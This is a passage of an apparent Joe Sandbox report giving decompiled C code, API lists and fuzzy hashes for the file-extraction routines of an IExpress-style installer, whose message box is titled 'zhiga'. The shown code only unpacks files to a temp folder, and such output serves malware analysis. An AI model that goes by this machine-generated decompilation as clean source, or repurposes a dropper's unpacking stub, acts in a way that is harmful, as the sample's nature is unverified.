                                                          				if( *0x10991d8 == 0) {
                                                          					_t32 = _a4;
                                                          					__eflags = _t32;
                                                          					if(_t32 == 0) {
                                                          						_t33 = E01094E99(_t75);
                                                          						L35:
                                                          						return E01096CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                          					}
                                                          					_t35 = _t32 - 1;
                                                          					__eflags = _t35;
                                                          					if(_t35 == 0) {
                                                          						L9:
                                                          						_t33 = 0;
                                                          						goto L35;
                                                          					}
                                                          					_t36 = _t35 - 1;
                                                          					__eflags = _t36;
                                                          					if(_t36 == 0) {
                                                          						_t37 =  *0x1098584; // 0x0
                                                          						__eflags = _t37;
                                                          						if(_t37 != 0) {
                                                          							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                          						}
                                                          						_t54 = 0x10991e4;
                                                          						_t58 = 0x10991e4;
                                                          						do {
                                                          							_t38 =  *_t58;
                                                          							_t58 =  &(_t58[1]);
                                                          							__eflags = _t38;
                                                          						} while (_t38 != 0);
                                                          						_t59 = _t58 - 0x10991e5;
                                                          						__eflags = _t59;
                                                          						_t71 =  *(_t75 + 4);
                                                          						_t73 =  &(_t71[1]);
                                                          						do {
                                                          							_t39 =  *_t71;
                                                          							_t71 =  &(_t71[1]);
                                                          							__eflags = _t39;
                                                          						} while (_t39 != 0);
                                                          						_t69 = _t71 - _t73;
                                                          						_t30 = _t59 + 1 + _t71 - _t73;
                                                          						__eflags = _t30 - 0x104;
                                                          						if(_t30 >= 0x104) {
                                                          							L3:
                                                          							_t33 = _t30 | 0xffffffff;
                                                          							goto L35;
                                                          						}
                                                          						_t69 = 0x10991e4;
                                                          						_t30 = E01094702( &_v268, 0x10991e4,  *(_t75 + 4));
                                                          						__eflags = _t30;
                                                          						if(__eflags == 0) {
                                                          							goto L3;
                                                          						}
                                                          						_t41 = E0109476D( &_v268, __eflags);
                                                          						__eflags = _t41;
                                                          						if(_t41 == 0) {
                                                          							goto L9;
                                                          						}
                                                          						_push(0x180);
                                                          						_t30 = E01094980( &_v268, 0x8302); // executed
                                                          						_t75 = _t30;
                                                          						__eflags = _t75 - 0xffffffff;
                                                          						if(_t75 == 0xffffffff) {
                                                          							goto L3;
                                                          						}
                                                          						_t30 = E010947E0( &_v268);
                                                          						__eflags = _t30;
                                                          						if(_t30 == 0) {
                                                          							goto L3;
                                                          						}
                                                          						 *0x10993f4 =  *0x10993f4 + 1;
                                                          						_t33 = _t75;
                                                          						goto L35;
                                                          					}
                                                          					_t44 = _t36 - 1;
                                                          					__eflags = _t44;
                                                          					if(_t44 == 0) {
                                                          						_t54 = 0x10991e4;
                                                          						_t63 = 0x10991e4;
                                                          						do {
                                                          							_t45 =  *_t63;
                                                          							_t63 =  &(_t63[1]);
                                                          							__eflags = _t45;
                                                          						} while (_t45 != 0);
                                                          						_t74 =  *(_t75 + 4);
                                                          						_t64 = _t63 - 0x10991e5;
                                                          						__eflags = _t64;
                                                          						_t69 =  &(_t74[1]);
                                                          						do {
                                                          							_t46 =  *_t74;
                                                          							_t74 =  &(_t74[1]);
                                                          							__eflags = _t46;
                                                          						} while (_t46 != 0);
                                                          						_t73 = _t74 - _t69;
                                                          						_t30 = _t64 + 1 + _t74 - _t69;
                                                          						__eflags = _t30 - 0x104;
                                                          						if(_t30 >= 0x104) {
                                                          							goto L3;
                                                          						}
                                                          						_t69 = 0x10991e4;
                                                          						_t30 = E01094702( &_v268, 0x10991e4,  *(_t75 + 4));
                                                          						__eflags = _t30;
                                                          						if(_t30 == 0) {
                                                          							goto L3;
                                                          						}
                                                          						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                          						_t30 = E01094C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                          						__eflags = _t30;
                                                          						if(_t30 == 0) {
                                                          							goto L3;
                                                          						}
                                                          						E01094B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                          						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                          						__eflags = _t50;
                                                          						if(_t50 != 0) {
                                                          							_t51 = _t50 & 0x00000027;
                                                          							__eflags = _t51;
                                                          						} else {
                                                          							_t51 = 0x80;
                                                          						}
                                                          						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                          						__eflags = _t30;
                                                          						if(_t30 == 0) {
                                                          							goto L3;
                                                          						} else {
                                                          							_t33 = 1;
                                                          							goto L35;
                                                          						}
                                                          					}
                                                          					_t30 = _t44 - 1;
                                                          					__eflags = _t30;
                                                          					if(_t30 == 0) {
                                                          						goto L3;
                                                          					}
                                                          					goto L9;
                                                          				}
                                                          				if(_a4 == 3) {
                                                          					_t30 = E01094B60( *((intOrPtr*)(_t75 + 0x14)));
                                                          				}
                                                          				goto L3;
                                                          			}
































                                                          APIs
                                                          • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 01094DB5
                                                          • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 01094DDD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: AttributesFileItemText
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                          • API String ID: 3625706803-2356899610
                                                          • Opcode ID: 03bc112f74b20e0a0985f547804ac75b3fcae55616ac999aa9089d8a94f0fce5
                                                          • Instruction ID: 3400e51a4cabd4d14df1e0ba29540e94b7887cb044663d63ea097d5c29442cc6
                                                          • Opcode Fuzzy Hash: 03bc112f74b20e0a0985f547804ac75b3fcae55616ac999aa9089d8a94f0fce5
                                                          • Instruction Fuzzy Hash: 5941263A2041068BDF61AE2CDB746F977E5FF45304F0486A8D8C2D7285DA32DA47E750
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01094C37(signed int __ecx, int __edx, int _a4) {
                                                          				struct _FILETIME _v12;
                                                          				struct _FILETIME _v20;
                                                          				FILETIME* _t14;
                                                          				int _t15;
                                                          				signed int _t21;
                                                          
                                                          				_t21 = __ecx * 0x18;
                                                          				if( *((intOrPtr*)(_t21 + 0x1098d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                          					L5:
                                                          					return 0;
                                                          				} else {
                                                          					_t14 =  &_v12;
                                                          					_t15 = SetFileTime( *(_t21 + 0x1098d74), _t14, _t14, _t14); // executed
                                                          					if(_t15 == 0) {
                                                          						goto L5;
                                                          					}
                                                          					return 1;
                                                          				}
                                                          			}









                                                          APIs
                                                          • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 01094C54
                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 01094C66
                                                          • SetFileTime.KERNELBASE(?,?,?,?), ref: 01094C7E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Time$File$DateLocal
                                                          • String ID:
                                                          • API String ID: 2071732420-0
                                                          • Opcode ID: aaafb29129fbd7699be28013b2e6aa42d84d920522020656fc6c3bbfd43e298c
                                                          • Instruction ID: 922700d8bee6759be7f71a780c34d4c66598bc0792020367ae543f7deaaa6640
                                                          • Opcode Fuzzy Hash: aaafb29129fbd7699be28013b2e6aa42d84d920522020656fc6c3bbfd43e298c
                                                          • Instruction Fuzzy Hash: A7F024B261020DBFAFA4EFA8CD68CFF7BECEB04240700456BB981C2200EA31D504D7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 75%
                                                          			E0109487A(CHAR* __ecx, signed int __edx) {
                                                          				void* _t7;
                                                          				CHAR* _t11;
                                                          				long _t18;
                                                          				long _t23;
                                                          
                                                          				_t11 = __ecx;
                                                          				asm("sbb edi, edi");
                                                          				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                          				if((__edx & 0x00000100) == 0) {
                                                          					asm("sbb esi, esi");
                                                          					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                          				} else {
                                                          					if((__edx & 0x00000400) == 0) {
                                                          						asm("sbb esi, esi");
                                                          						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                          					} else {
                                                          						_t23 = 1;
                                                          					}
                                                          				}
                                                          				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                          				if(_t7 != 0xffffffff || _t23 == 3) {
                                                          					return _t7;
                                                          				} else {
                                                          					E0109490C(_t11);
                                                          					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                          				}
                                                          			}








                                                          APIs
                                                          • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,01094A23,?,01094F67,*MEMCAB,00008000,00000180), ref: 010948DE
                                                          • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,01094F67,*MEMCAB,00008000,00000180), ref: 01094902
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 755b2a1c76af2257ce1d8dd58247d15cedece31680785c136bda4b05825c9b2e
                                                          • Instruction ID: e7ecd0f19c5830c37a36faa31314f709a521649baaf10a99740df91640163a2c
                                                          • Opcode Fuzzy Hash: 755b2a1c76af2257ce1d8dd58247d15cedece31680785c136bda4b05825c9b2e
                                                          • Instruction Fuzzy Hash: D301ADA3E1253026F72440284D98FFB454CDBD6630F1B0331FEEAEB1C1D1644C0192E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E01094AD0(signed int _a4, void* _a8, long _a12) {
                                                          				signed int _t9;
                                                          				int _t12;
                                                          				signed int _t14;
                                                          				signed int _t15;
                                                          				void* _t20;
                                                          				struct HWND__* _t21;
                                                          				signed int _t24;
                                                          				signed int _t25;
                                                          
                                                          				_t20 =  *0x109858c; // 0x274
                                                          				_t9 = E01093680(_t20);
                                                          				if( *0x10991d8 == 0) {
                                                          					_push(_t24);
                                                          					_t12 = WriteFile( *(0x1098d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                          					if(_t12 != 0) {
                                                          						_t25 = _a12;
                                                          						if(_t25 != 0xffffffff) {
                                                          							_t14 =  *0x1099400; // 0x5e800
                                                          							_t15 = _t14 + _t25;
                                                          							 *0x1099400 = _t15;
                                                          							if( *0x1098184 != 0) {
                                                          								_t21 =  *0x1098584; // 0x0
                                                          								if(_t21 != 0) {
                                                          									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x10993f8, 0);
                                                          								}
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t25 = _t24 | 0xffffffff;
                                                          					}
                                                          					return _t25;
                                                          				} else {
                                                          					return _t9 | 0xffffffff;
                                                          				}
                                                          			}











                                                          APIs
                                                            • Part of subcall function 01093680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0109369F
                                                            • Part of subcall function 01093680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010936B2
                                                            • Part of subcall function 01093680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010936DA
                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 01094B05
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                          • String ID:
                                                          • API String ID: 1084409-0
                                                          • Opcode ID: 1b466fe10650589e4b16c030bc388220a4a280c2b21d6292533105352816769a
                                                          • Instruction ID: 651bd0f2ac97860068a1a268a44178ee99de5407a2e856916f73179b079f1e97
                                                          • Opcode Fuzzy Hash: 1b466fe10650589e4b16c030bc388220a4a280c2b21d6292533105352816769a
                                                          • Instruction Fuzzy Hash: BB01D2312002049BEB248F28DD35BA67B98F744725F04C36AFAB9D72D4CB368812DB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0109658A(char* __ecx, void* __edx, char* _a4) {
                                                          				intOrPtr _t4;
                                                          				char* _t6;
                                                          				char* _t8;
                                                          				void* _t10;
                                                          				void* _t12;
                                                          				char* _t16;
                                                          				intOrPtr* _t17;
                                                          				void* _t18;
                                                          				char* _t19;
                                                          
                                                          				_t16 = __ecx;
                                                          				_t10 = __edx;
                                                          				_t17 = __ecx;
                                                          				_t1 = _t17 + 1; // 0x1098b3f
                                                          				_t12 = _t1;
                                                          				do {
                                                          					_t4 =  *_t17;
                                                          					_t17 = _t17 + 1;
                                                          				} while (_t4 != 0);
                                                          				_t18 = _t17 - _t12;
                                                          				_t2 = _t18 + 1; // 0x1098b40
                                                          				if(_t2 < __edx) {
                                                          					_t19 = _t18 + __ecx;
                                                          					if(_t19 > __ecx) {
                                                          						_t8 = CharPrevA(__ecx, _t19); // executed
                                                          						if( *_t8 != 0x5c) {
                                                          							 *_t19 = 0x5c;
                                                          							_t19 =  &(_t19[1]);
                                                          						}
                                                          					}
                                                          					_t6 = _a4;
                                                          					 *_t19 = 0;
                                                          					while( *_t6 == 0x20) {
                                                          						_t6 = _t6 + 1;
                                                          					}
                                                          					return E010916B3(_t16, _t10, _t6);
                                                          				}
                                                          				return 0x8007007a;
                                                          			}












                                                          APIs
                                                          • CharPrevA.USER32(01098B3E,01098B3F,00000001,01098B3E,-00000003,?,010960EC,01091140,?), ref: 010965BA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: CharPrev
                                                          • String ID:
                                                          • API String ID: 122130370-0
                                                          • Opcode ID: 330a1a513532abbd0869a1521d03b90dbb61181f09b02e5956071daae65625eb
                                                          • Instruction ID: 868fad7dd678333c7cc55faa1f60551fff0f562445fcf6ca27c10cfc424d498c
                                                          • Opcode Fuzzy Hash: 330a1a513532abbd0869a1521d03b90dbb61181f09b02e5956071daae65625eb
                                                          • Instruction Fuzzy Hash: 57F042326042509BDB32051D9894BA6BFDD9B86150F18019EE9DEC3249CA674C45E3A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E0109621E() {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				signed int _t5;
                                                          				void* _t9;
                                                          				void* _t13;
                                                          				void* _t19;
                                                          				void* _t20;
                                                          				signed int _t21;
                                                          
                                                          				_t5 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t5 ^ _t21;
                                                          				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                          					0x4f0 = 2;
                                                          					_t9 = E0109597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                          				} else {
                                                          					E010944B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                          					 *0x1099124 = E01096285();
                                                          					_t9 = 0;
                                                          				}
                                                          				return E01096CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                          			}











                                                          APIs
                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0109623F
                                                            • Part of subcall function 010944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01094518
                                                            • Part of subcall function 010944B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 01094554
                                                            • Part of subcall function 01096285: GetLastError.KERNEL32(01095BBC), ref: 01096285
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                          • String ID:
                                                          • API String ID: 381621628-0
                                                          • Opcode ID: 746a3c7b41e90359eaf6f92549d1c4c5cf17e8452f1a0403741bb4ff12e834d1
                                                          • Instruction ID: de5f3a78d799711dd92e4e693c420e310aa6a4d20ee31807fbd2ca85bbec772c
                                                          • Opcode Fuzzy Hash: 746a3c7b41e90359eaf6f92549d1c4c5cf17e8452f1a0403741bb4ff12e834d1
                                                          • Instruction Fuzzy Hash: B7F0B4B07002096BEF60EB748D21BFE32A8EB94300F4000AAA9C5D7181ED7699409750
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01094B60(signed int _a4) {
                                                          				signed int _t9;
                                                          				signed int _t15;
                                                          
                                                          				_t15 = _a4 * 0x18;
                                                          				if( *((intOrPtr*)(_t15 + 0x1098d64)) != 1) {
                                                          					_t9 = FindCloseChangeNotification( *(_t15 + 0x1098d74)); // executed
                                                          					if(_t9 == 0) {
                                                          						return _t9 | 0xffffffff;
                                                          					}
                                                          					 *((intOrPtr*)(_t15 + 0x1098d60)) = 1;
                                                          					return 0;
                                                          				}
                                                          				 *((intOrPtr*)(_t15 + 0x1098d60)) = 1;
                                                          				 *((intOrPtr*)(_t15 + 0x1098d68)) = 0;
                                                          				 *((intOrPtr*)(_t15 + 0x1098d70)) = 0;
                                                          				 *((intOrPtr*)(_t15 + 0x1098d6c)) = 0;
                                                          				return 0;
                                                          			}





                                                          APIs
                                                          • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,01094FA1,00000000), ref: 01094B98
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotification
                                                          • String ID:
                                                          • API String ID: 2591292051-0
                                                          • Opcode ID: 40a143cdf044211cb21b4d03b840898283bbb869788c1f1d431a2c13a6ddc8a7
                                                          • Instruction ID: 9c337b9966dcd9393d862fe66085ffa67e061e7cddbdd81e00c719249ad186b6
                                                          • Opcode Fuzzy Hash: 40a143cdf044211cb21b4d03b840898283bbb869788c1f1d431a2c13a6ddc8a7
                                                          • Instruction Fuzzy Hash: C3F08270501B0DAE4B79AE2DCD6069ABBE6BAD2260310892F91EED2240E7316401DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010966AE(CHAR* __ecx) {
                                                          				unsigned int _t1;
                                                          
                                                          				_t1 = GetFileAttributesA(__ecx); // executed
                                                          				if(_t1 != 0xffffffff) {
                                                          					return  !(_t1 >> 4) & 0x00000001;
                                                          				} else {
                                                          					return 0;
                                                          				}
                                                          			}




                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(?,01094777,?,01094E38,?), ref: 010966B1
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 167f646a4ab244b40231b8ddf202c1f0d96b864e6146a1e191d061cdb7e11428
                                                          • Instruction ID: 9019b05112d0538e5755d4f8fd56adad567129595730987d757c9e181b0abaf1
                                                          • Opcode Fuzzy Hash: 167f646a4ab244b40231b8ddf202c1f0d96b864e6146a1e191d061cdb7e11428
                                                          • Instruction Fuzzy Hash: 5AB09276626440826E6106396C395562881B6C123A7E41B90F072C11D4CA3FD456E144
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01094CA0(long _a4) {
                                                          				void* _t2;
                                                          
                                                          				_t2 = GlobalAlloc(0, _a4); // executed
                                                          				return _t2;
                                                          			}




                                                          APIs
                                                          • GlobalAlloc.KERNELBASE(00000000,?), ref: 01094CAA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: AllocGlobal
                                                          • String ID:
                                                          • API String ID: 3761449716-0
                                                          • Opcode ID: e60cc1cf20630202660a65a0257057fa363ae5be11ccdab1a63df5f503e02804
                                                          • Instruction ID: d4570b6a02e36b4c7deec9b11dc91c41b341799160bd4c396877bfef19493207
                                                          • Opcode Fuzzy Hash: e60cc1cf20630202660a65a0257057fa363ae5be11ccdab1a63df5f503e02804
                                                          • Instruction Fuzzy Hash: 3AB0123214420CF7CF101EC6E809F853F1DF7C4761F140000F60C460408A7794208795
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01094CC0(void* _a4) {
                                                          				void* _t2;
                                                          
                                                          				_t2 = GlobalFree(_a4); // executed
                                                          				return _t2;
                                                          			}




                                                          0x01094cc8
                                                          0x01094ccf

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: FreeGlobal
                                                          • String ID:
                                                          • API String ID: 2979337801-0
                                                          • Opcode ID: 2b48e39273100b54911a4bd00a8309387458354263ff6f5a2f6fb4296d1e4dbf
                                                          • Instruction ID: ff6e54feb67e8d7186717a30eb35674112eac4848a1a91e9dd4b17198937027c
                                                          • Opcode Fuzzy Hash: 2b48e39273100b54911a4bd00a8309387458354263ff6f5a2f6fb4296d1e4dbf
                                                          • Instruction Fuzzy Hash: 7FB0123100010CF78F101A46E8088453F1DE6C03607000010F50C420118B3B98118684
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 92%
                                                          			E01095C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				CHAR* _v265;
                                                          				char _v266;
                                                          				char _v267;
                                                          				char _v268;
                                                          				CHAR* _v272;
                                                          				char _v276;
                                                          				signed int _v296;
                                                          				char _v556;
                                                          				signed int _t61;
                                                          				int _t63;
                                                          				char _t67;
                                                          				CHAR* _t69;
                                                          				signed int _t71;
                                                          				void* _t75;
                                                          				char _t79;
                                                          				void* _t83;
                                                          				void* _t85;
                                                          				void* _t87;
                                                          				intOrPtr _t88;
                                                          				void* _t100;
                                                          				intOrPtr _t101;
                                                          				CHAR* _t104;
                                                          				intOrPtr _t105;
                                                          				void* _t111;
                                                          				void* _t115;
                                                          				CHAR* _t118;
                                                          				void* _t119;
                                                          				void* _t127;
                                                          				CHAR* _t129;
                                                          				void* _t132;
                                                          				void* _t142;
                                                          				signed int _t143;
                                                          				CHAR* _t144;
                                                          				void* _t145;
                                                          				void* _t146;
                                                          				void* _t147;
                                                          				void* _t149;
                                                          				char _t155;
                                                          				void* _t157;
                                                          				void* _t162;
                                                          				void* _t163;
                                                          				char _t167;
                                                          				char _t170;
                                                          				CHAR* _t173;
                                                          				void* _t177;
                                                          				intOrPtr* _t183;
                                                          				intOrPtr* _t192;
                                                          				CHAR* _t199;
                                                          				void* _t200;
                                                          				CHAR* _t201;
                                                          				void* _t205;
                                                          				void* _t206;
                                                          				int _t209;
                                                          				void* _t210;
                                                          				void* _t212;
                                                          				void* _t213;
                                                          				CHAR* _t218;
                                                          				intOrPtr* _t219;
                                                          				intOrPtr* _t220;
                                                          				signed int _t221;
                                                          				signed int _t223;
                                                          
                                                          				_t173 = __ecx;
                                                          				_t61 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t61 ^ _t221;
                                                          				_push(__ebx);
                                                          				_push(__esi);
                                                          				_push(__edi);
                                                          				_t209 = 1;
                                                          				if(__ecx == 0 ||  *__ecx == 0) {
                                                          					_t63 = 1;
                                                          				} else {
                                                          					L2:
                                                          					while(_t209 != 0) {
                                                          						_t67 =  *_t173;
                                                          						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                          							_t173 = CharNextA(_t173);
                                                          							continue;
                                                          						}
                                                          						_v272 = _t173;
                                                          						if(_t67 == 0) {
                                                          							break;
                                                          						} else {
                                                          							_t69 = _v272;
                                                          							_t177 = 0;
                                                          							_t213 = 0;
                                                          							_t163 = 0;
                                                          							_t202 = 1;
                                                          							do {
                                                          								if(_t213 != 0) {
                                                          									if(_t163 != 0) {
                                                          										break;
                                                          									} else {
                                                          										goto L21;
                                                          									}
